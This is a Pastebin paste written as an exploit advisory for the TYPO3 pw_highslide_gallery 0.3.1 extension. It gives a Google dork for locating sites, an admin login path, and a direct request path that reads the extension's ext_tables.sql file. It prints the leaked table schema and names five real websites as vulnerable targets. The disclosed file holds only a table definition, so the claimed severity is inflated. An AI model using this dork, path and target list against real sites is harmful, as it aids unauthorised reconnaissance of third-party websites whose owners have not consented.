KingSkrupellos

Typo3 CMS pw_highslide_gallery Extension 0.3.1 Database Disc

Jan 5th, 2019
180
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.55 KB | None | 0 0
  1. ##############################################################################
  2.  
  3. # Exploit Title : Typo3 CMS pw_highslide_gallery Extension 0.3.1 Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
  5. # Date : 02/01/2019
  6. # Vendor Homepage : typo3.org
  7. # Software Download Link : extensions.typo3.org/extension/download/pw_highslide_gallery/0.3.1/zip/
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Version Information : 0.3.1
  11. # Exploit Risk : Medium
  12. # Google Dorks : inurl:''/typo3conf/ext/pw_highslide_gallery/''
  13. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  14. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  15. # CxSecurity Exploit Reference Link :
  16. cxsecurity.com/issue/WLB-2019010028
  17. # PacketStormSecurity Exploit Reference Link :
  18. packetstormsecurity.com/files/150996/Typo3-CMS-pw_highslide_gallery-0.3.1-Database-Disclosure.html
  19.  
  20. ##############################################################################
  21.  
  22. # Admin Panel Login Path :
  23.  
  24. /typo3/index.php
  25.  
  26. # Exploit :
  27.  
  28. /typo3conf/ext/pw_highslide_gallery/ext_tables.sql
  29.  
  30. ##############################################################################
  31.  
  32. #
  33. # Table structure for table 'tt_content'
  34. #
  35. CREATE TABLE tt_content (
  36. tx_pwhighslidegallery_useHighslide tinyint(3) DEFAULT '0' NOT NULL,
  37. tx_pwhighslidegallery_hidetitle tinyint(3) DEFAULT '0' NOT NULL,
  38. tx_pwhighslidegallery_hidedesc tinyint(3) DEFAULT '0' NOT NULL,
  39. tx_pwhighslidegallery_squarethumbs tinyint(3) DEFAULT '0' NOT NULL
  40. tx_pwhighslidegallery_category int(11) DEFAULT '-1' NOT NULL,
  41. tx_pwhighslidegallery_sort tinyint(3) DEFAULT '0' NOT NULL
  42. );
  43.  
  44. ################################################################################
  45.  
  46. Information About Database =>
  47.  
  48. ext_tables.sql
  49. ************************
  50.  
  51. This file contains SQL statements to update or create tables for your extension in the TYPO3 database.
  52.  
  53. This file should contain a table structure dump of the tables used by the extension.
  54.  
  55. It is used for evaluation of the database structure and is therefore important to check and update
  56.  
  57. the database when an extension is enabled. If you add additional fields (or depend on certain fields)
  58.  
  59. to existing tables, you can also put them here. In that case, insert a CREATE TABLE structure
  60.  
  61. for that table, but remove all lines except the ones defining the fields you need. The ext_tables.sql
  62.  
  63. file may not necessarily be dumpable directly to MySQL (because of the semi-complete
  64.  
  65. table definitions allowed defining only required fields.). But the EM or
  66.  
  67. Install Tool can handle this. The only very important thing is that the syntax of the content
  68.  
  69. is exactly like MySQL made it so that the parsing and analysis routines of the EM don't get confused.
  70.  
  71. ##############################################################################
  72.  
  73. # Example Vulnerable Sites =>
  74.  
  75. [+] brennholzaktion.at/typo3conf/ext/pw_highslide_gallery/ext_tables.sql
  76.  
  77. [+] delbrueck-villen.de/typo3conf/ext/pw_highslide_gallery/ext_tables.sql
  78.  
  79. [+] oevp-aich-assach.at/typo3conf/ext/pw_highslide_gallery/ext_tables.sql
  80.  
  81. [+] zimmerei-unas.de/typo3conf/ext/pw_highslide_gallery/ext_tables.sql
  82.  
  83. [+] ferienwohnung-schuler.at/typo3conf/ext/pw_highslide_gallery/ext_tables.sql
  84.  
  85. ##############################################################################
  86.  
  87. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  88.  
  89. ##############################################################################
Advertisement
Add Comment
Please, Sign In to add comment